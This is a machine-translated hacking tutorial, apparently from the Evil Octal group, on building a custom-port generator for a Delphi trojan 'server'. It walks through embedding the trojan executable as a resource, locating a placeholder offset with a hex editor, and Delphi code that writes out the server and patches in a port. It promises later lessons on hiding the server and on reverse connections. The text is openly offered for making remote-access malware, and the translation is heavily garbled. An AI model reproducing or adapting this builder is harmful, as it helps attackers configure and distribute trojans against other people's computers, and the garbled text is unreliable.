Original Delphi Trojan DIY Build Server

Article God's Forbidden Zone
Information Source: Evil Octal Information Security team (www.eviloctal.com)
Delphi Trojan DIY Build Server
I am here to generate a simple server, why not first talk about the service side of the hidden? Because I think the service-side is better to understand a bit, simple, we can easily,ok,let& #39; S GO.
Other ways to generate services on the network I am not very clear, I will use my method to explain to you (but first of all, my method is also from the network, if and whose method is the same, please do not say I infringe copyright, because I do not know who the original author, I This article is not for commercial purposes, If a friend thinks that I violated his copyright, please notify me immediately, I will cancel the continuation of this article immediately! Or give him in the article signed, OK, the main I was to learn the law, so talk a little nagging, but China has a saying: "ugly words said in front." "But there are fewer people to use."
Begin:
First, we need to change the server we configured.
Service side we will not have to customize the port, and then I do one step at a time, do not ask why, I will explain later
We open the service side of the project, is there a sentence on it?
Var
Form1:tform1;
Yes, right here, we add a sentence: duankou:string =& #39;xxxxx& #39;;
It's the global variable, and then we'll click on the Form1 window, which is your original window, add an event
ONCREATE is tform1.formcreate, which means what to do when the window is set up. Let's add this statement:
NMUDP1. Localport:=strtoint (Duankou);
This means that the local port of NMUDP1 is a number of Duankou. (Strtoint means to convert a string to a number, you know)
The meaning is already very clear, duankou:string =& #39;xxxxx& #39; why xxxxx? It's mostly a good search, hey.
OK, our service is basically configured, and now let's build the server, this should be.
Two. Step two actually, we're going to do two things.
1). is to make the service end into a resource
2). Just find the location of the xxxxx on the service side
Ok let's start by looking at the location of the xxxxx on the service side.
1. We open any one of the 16 editor, use this editor to open our server, this simple bar.
2. Search xxxxx, this should be able to search out the xxxxx location, I this is 4e240. OK, your differences will be decided by yourself.
3. Open a binary conversion tool (I also wrote a, recommended to the evil octal search Sobiny published articles, inside should have this tool oh, hey, play an AD) convert 4e240 to 10 binary numbers. 320064 I this is, must remember this number oh, we will use the thing, this is the most important thing Oh!
All right, let's get the server to be a resource.
1. We create a text document in the folder where the server is generated and write a word
Fuwuduan RCDATA Server.exe
Identifier Area Bar file name
Identifiers try not to be the same as the file name, sometimes error, OK, listen to me, thank you
We have renamed this text document FUWU.RC this should not be explained.
2. Create a batch file that says a word
Path=e:\program Files\borland\delphi7\bin;
BRCC32 fuwu.rc
Path for your delphi7 bin directory, OK, and then run this batch, in your server folder will generate a fuwu.res this is a resource oh, hey, important things
We copied him to the client side of the folder, OK, we have to prepare for this step is done ~ ~ ~
Three. The third step is to configure the customer service side so that the client can generate a custom port service segment
1. We want to add a word to the customer service DPR {$R *.res} with a {$R fuwu.res} means that the program will automatically load a server-side resource when it is generated.
2. We're going to start trying to build a service side, but this is important, and we'll say it in the fourth step.
Four. The most important step is to take the main step, and then do it, and I will explain it in detail.
1. We generate a global variable first
Add a sentence to the bottom of the uses and the type above:
Const Offset_duankou = 320064;//This depends on your own value.
Give the code of this paragraph, lest the Novice can not understand
Uses
Windows, Messages, sysutils, variants, Classes, Graphics, Controls, Forms,
Dialogs, Stdctrls, nmudp;
Const Offset_duankou = 320064;
Type
TForm1 = Class (Tform)
button1:tbutton;//see where I'm from.
2. We add two controls edit and press the button, edit is used to write the port that you want to generate the server, the button is generated.
3. We generate a Button2 click event
We now declare in the Button2 click event
Var
Writebuff, Ziyuanzhizhen:pchar;
ZIYUANWEIZHI:HRSRC;
Ziyuandaxiao, Byteswritten:longword;
Shujuchulijubing:thandle;
Shenqingzhizhen:thandle;
duankou:string;
Now we begin.
BEGIN
Duankou:=trim (Edit4.text); Text with Port EDIT4
Ziyuanweizhi: = FindResource (hinstance, & #39;fuwuduan& #39;, rt_rcdata); Resource pointer for the found resource & #39;fuwuduan& #39; (That's the identifier I said first)
Ziyuandaxiao: = Sizeofresource (hinstance, Ziyuanweizhi);//Resource size
Shujuchulijubing: = LoadResource (hinstance, Ziyuanweizhi); Data processing sentence Bing
Ziyuanzhizhen: = Lockresource (shujuchulijubing);//resource pointer
Shenqingzhizhen: = CreateFile (Pchar (& #39;server.exe& #39;), generic_write, file_share_write, Nil, Create_ Always, file_attribute_normal, 0);
WriteFile (Shenqingzhizhen, ziyuanzhizhen^, Ziyuandaxiao, Byteswritten, nil);//write file
Sleep (100);
SetFilePointer (Shenqingzhizhen, Offset_duankou, Nil, file_begin);//Reposition pointer
Writebuff: = PChar (Duankou + Stringofchar (#0, 5-length (Duankou)));//data to be written
WriteFile (Shenqingzhizhen, writebuff^, 5, Byteswritten, nil);//Modify the file again
CloseHandle (Shenqingzhizhen);//Close Resource
End
I can't explain it to you in detail, but if you're smart, you should be able to get used to it.
Note that setfilepointer here Offset_duankou is the address to start writing, of course, the address we found first.
Writebuff inside of the 5 for the length of the xxxxx, WriteFile inside of 5 is also, Shenqingzhizhen inside the & #39;server.exe& #39; You can change your name, or the full path, Or it could be an edit.
And then we build this customer service side, After setting the Edit4.text (that is, to generate the port, I this for convenience there is no fault-tolerant AH, hint error, such as, but the rules of the port customization, you should be clear) Click BUTTON2, then in the current folder will generate a server, after the port will be edit4.text content
Let's test it.
I am in the xp+delphi environment everything is normal. ~~~
Well, it's here today, next time I will talk about how to achieve the service side of the hidden, if there is a chance, I will tell you about the reverse connection and so on. Welcome to the evil octal look at the information, I believe that soon after, you will become a master (why not say "also become a master"?) Because I am still a novice, I am now to become a member of the evil octal study hard, but because the technology is not, so still study hard, even the requirements are not dare to ask Ah! Oh. I believe that you will soon be able to become a member of the evil octal, it is a glorious.
Okay, I'll see you next.

Original Delphi Trojan DIY Build Server